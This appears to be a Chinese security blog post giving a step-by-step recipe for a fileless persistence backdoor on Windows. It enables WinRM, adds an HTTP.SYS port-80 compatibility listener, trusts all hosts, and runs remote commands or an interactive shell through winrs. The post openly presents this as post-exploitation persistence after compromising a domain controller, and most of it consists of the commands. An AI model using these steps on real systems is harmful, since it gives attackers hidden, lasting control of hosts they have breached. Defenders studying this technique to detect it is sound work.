HTTP.SYS端口复用维持权限

白色键盘 2.2K 1

转载自自己:https://www.secquan.org/Discuss/1070496

开启步骤

1.开启WinRM服务

2.新增80端口Listerner

3. 修改WinRM端口

WinRM服务是什么?
Windows远程管理Windows远程管理(WinRM)是Microsoft对WS-Management协议,标准的简单对象访问协议(SOAP)的,防火墙友好协议,允许硬件和操作系统,不同厂商进行互操作。
WS管理协议规范提供了一种系统,以便在整个IT基础架构访问和交换管理信息的常用方法。 WinRM和智能平台管理接口(IPMI),与事件收集器一起是Windows硬件管理功能的组件。
HTTP.SYS是什么?
HTTP.SYS端口复用后门原理是使用Windows自带的的管理服务WinRM,组合HTTP.SYS驱动自带的端口复用功能,一起实现端口复用后门。
HTTP.SYS是IIS的组成部分,主要功能是HTTP协议处理,HTTP.SYS可以与IIS HTTP服务共享同一个端口。
后门配置

1.开启WINRM服务

只需要一条命令即可

winrm quickconfig -q

WINRM默认端口为 HTTP:5985 HTTPS:5986

2.新增80端口Listener

执行:winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}

file

可以看到开启的80端口页面

file

可以看到WINRM默认端口

执行netsh http show servicestater,可以看到HTTP.SYS新注册的URL前缀

file

2.后门连接使用

在本机开启WINRM服务

此时运行CMD需要使用管理者身份运行,不然会出现权限不够

winrm quickconfig -q # 开启服务

winrm set winrm/config/Client @{TrustedHosts="*"} # 设置信任连接的主机为所有

file

然后直接使用winrs命令连接远程WinRM服务即可执行命令

winrs -r:http://127.0.0.1 -u:administrator -p:password whoami

上述会在远程主机执行whoami命令

file

如果你想获得一个交互式shell,直接在后面输入CMD即可

file

注:有人肯定会想,这个后门有什么用,必须要账号密码才能执行命令,但是在后渗透中这种后门非常有用,当你拿下域控DC,读出密码,在不留文件的情况下留下后门,又或者管理员关掉远程端口,也能执行系统命令,做到持续化控制。

发表评论 取消回复
表情 图片 链接 代码

  1. white
    white Lv 1

    保安敬礼.jpg
    ( ̄^ ̄)ゞ

分享